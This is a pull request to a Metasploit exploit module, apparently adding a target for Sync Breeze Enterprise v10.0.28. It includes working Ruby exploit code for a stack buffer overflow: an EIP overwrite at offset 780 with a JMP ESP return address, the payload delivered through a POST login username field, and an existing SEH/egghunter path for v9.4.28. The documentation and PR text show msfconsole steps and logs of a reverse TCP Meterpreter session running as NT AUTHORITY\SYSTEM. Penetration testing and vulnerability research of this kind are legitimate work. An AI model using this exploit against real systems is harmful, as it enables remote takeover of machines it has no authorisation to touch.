### PR TITLE
Sync Breeze HTTP Server v10.0.28 BOF

### DIFF
--- a/documentation/modules/exploit/windows/http/syncbreeze_bof.md
+++ b/documentation/modules/exploit/windows/http/syncbreeze_bof.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
+[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
 
 ## Verification Steps
   1. Install a vulnerable Sync Breeze Enterprise
@@ -10,13 +10,14 @@
   5. Check `Enable Web Server On Port 80` to start the web interface
   6. Start `msfconsole`
   7. Do `use exploit/windows/http/syncbreeze_bof`
-  8. Do `set RHOST ip`
-  9. Do `check`
-  10. Verify the target is vulnerable
-  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
-  12. Do `set LHOST ip`
-  13. Do `exploit`
-  14. Verify the Meterpreter session is opened
+  8. Select appropriate target via `set target 0` or `set target 1`
+  9. Do `set RHOST ip`
+  10. Do `check`
+  11. Verify the target is vulnerable
+  12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  13. Do `set LHOST ip`
+  14. Do `exploit`
+  15. Verify the Meterpreter session is opened
 
 ## Scenarios
 
@@ -71,4 +72,35 @@ Domain          : LAB
 Logged On Users : 3
 Meterpreter     : x86/windows
 meterpreter >
+```
+
+###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
+
+```
+msf > use exploit/windows/http/syncbreeze_bof 
+msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
+rhost => 192.168.10.61
+msf exploit(syncbreeze_bof) > set target 1
+target => 1
+msf exploit(syncbreeze_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.60:4444 
+[*] Sending request...
+[*] Sending stage (171583 bytes) to 192.168.10.61
+[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
+[+] negotiating tlv encryption
+[+] negotiated tlv encryption
+[+] negotiated tlv encryption
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : MUSHROOMKINGDOM
+OS              : Windows 7 (Build 7600).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
 ```

--- a/modules/exploits/windows/http/syncbreeze_bof.rb
+++ b/modules/exploits/windows/http/syncbreeze_bof.rb
@@ -15,15 +15,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Sync Breeze Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Sync Breeze Enterprise v9.4.28, caused by
-        improper bounds checking of the request path in HTTP GET requests
+        in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
+        improper bounds checking of the request in HTTP GET and POST requests
         sent to the built-in web server. This module has been tested
         successfully on Windows 7 SP1 x86.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Daniel Teixeira'
+          'Daniel Teixeira',
+          'Andrew Smith', # MSF support for v10.0.28
+          'Owais Mehtab'  # Original v10.0.28 exploit
         ],
       'DefaultOptions' =>
         {
@@ -42,6 +44,12 @@ class MetasploitModule < Msf::Exploit::Remote
               'Offset' => 2488,
               'Ret'    => 0x10015fde  # POP # POP # RET [libspp.dll]
             }
+          ],
+          [ 'Sync Breeze Enterprise v10.0.28',
+            {
+              'Offset' => 780,
+              'Ret'    => 0x10090c83  # JMP ESP [libspp.dll]
+            }
           ]
         ],
       'Privileged'     => true,
@@ -59,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
       version = res.body[/Sync Breeze Enterprise v[^<]*/]
       if version
         vprint_status("Version detected: #{version}")
-        if version =~ /9\.4\.28/
+        if version =~ /9\.4\.28/ or version =~ /10\.0\.28/
           return Exploit::CheckCode::Appears
         end
         return Exploit::CheckCode::Detected
@@ -74,29 +82,52 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
 
-    eggoptions = {
-      checksum: true,
-      eggtag: rand_text_alpha(4, payload_badchars)
-    }
+    case target.name
 
-    hunter, egg = generate_egghunter(
-      payload.encoded,
-      payload_badchars,
-      eggoptions
-    )
+    when 'Sync Breeze Enterprise v9.4.28'
+      eggoptions = {
+        checksum: true,
+        eggtag: rand_text_alpha(4, payload_badchars)
+      }
 
-    sploit =  rand_text_alpha(target['Offset'])
-    sploit << generate_seh_record(target.ret)
-    sploit << hunter
-    sploit << make_nops(10)
-    sploit << egg
-    sploit << rand_text_alpha(5500)
+      hunter, egg = generate_egghunter(
+        payload.encoded,
+        payload_badchars,
+        eggoptions
+      )
 
-    print_status('Sending request...')
+      sploit =  rand_text_alpha(target['Offset'])
+      sploit << generate_seh_record(target.ret)
+      sploit << hunter
+      sploit << make_nops(10)
+      sploit << egg
+      sploit << rand_text_alpha(5500)
 
-    send_request_cgi(
-      'method' => 'GET',
-      'uri'    => sploit
-    )
+      print_status('Sending request...')
+
+      send_request_cgi(
+        'method' => 'GET',
+        'uri'    => sploit
+      )
+
+    when 'Sync Breeze Enterprise v10.0.28'
+      uri = "/login"
+      sploit = rand_text_alpha(target['Offset'])
+      sploit << [target.ret].pack('V')
+      sploit << rand_text(4)
+      make_nops(10)
+      sploit << payload.encoded
+
+      print_status('Sending request...')
+
+      send_request_cgi(
+        'method' => 'POST',
+        'uri'    => uri,
+        'vars_post'     => {
+          'username' => "#{sploit}",
+          'password' => "rawr"
+        }
+      )
+    end
   end
 end


### PR DESCRIPTION
This PR adds support to the current Sync Breeze HTTP BOF module for v10.0.28. The added code exploits a vanilla EIP overwrite.

Installer: https://www.exploit-db.com/apps/959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe
Tested on: Windows 7 x32

## Verification

List the steps needed to make sure this thing works

- [x] Install Sync Breeze software and ensure the Sync Breeze service (HTTP Server) is running
- [x] Start `msfconsole`
- [x] `use exploit/windows/http/syncbreeze_bof`
- [x] `set target 1`
- [x] `set rhost 192.168.10.61`
- [x] `exploit`

## Example

```
msf > use exploit/windows/http/syncbreeze_bof 
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
rhost => 192.168.10.61
msf exploit(syncbreeze_bof) > set target 1
target => 1
msf exploit(syncbreeze_bof) > exploit

[*] Started reverse TCP handler on 192.168.10.60:4444 
[*] Sending request...
[*] Sending stage (171583 bytes) to 192.168.10.61
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MUSHROOMKINGDOM
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```


